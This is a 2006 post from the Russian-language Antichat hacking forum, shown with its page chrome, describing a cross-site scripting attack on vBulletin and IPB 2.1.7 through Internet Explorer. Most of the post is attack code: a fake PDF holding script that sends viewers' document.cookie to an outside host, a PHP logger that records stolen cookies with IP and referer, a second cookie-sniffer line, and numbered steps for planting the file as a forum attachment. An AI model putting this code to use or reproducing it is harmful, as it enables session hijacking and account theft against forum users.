ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу XSS vbulletin and IPB v2.1.7 With IE
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

XSS vbulletin and IPB v2.1.7 With IE
  #1  
Старый 06.08.2006, 10:42
Аватар для liauliau
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию XSS vbulletin and IPB v2.1.7 With IE
XSS vbulletin and IPB v2.1.7 With IE

test:<html><script> alert("hello");</script></html>

-----------------------------------------------------------------

test.pdf
------

Код:
<html><script>img = new Image(); img.src = "http://blablabla.org/c.php?c="+document.cookie;</script></html>

c.php
-----

Код:
<?php 
 $cookie = $_GET['c']; 
 $ip = getenv ('REMOTE_ADDR'); 
 $date=date("m/d/Y g:i:s a"); 
 $referer= getenv ('HTTP_REFERER'); 
 $fl = fopen('log.txt', 'a'); 
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n"); 
 fclose($fl); 
?>
1_ Пишут test.pdf и c.php
2_ Помещенный c.php на webserver.
3_ Изменяют(Заменяют) url в test.pdf.
4_ Делают пост с test.pdf как attachement.
5_, когда кто - то будет смотреть на ваш attachement, Вы получите его печенье в log.txt

Лог сниффера

Код:
<html>
<script>img = new Image(); img.src ="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</html>
Последний раз редактировалось liauliau; 06.08.2006 в 10:48..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ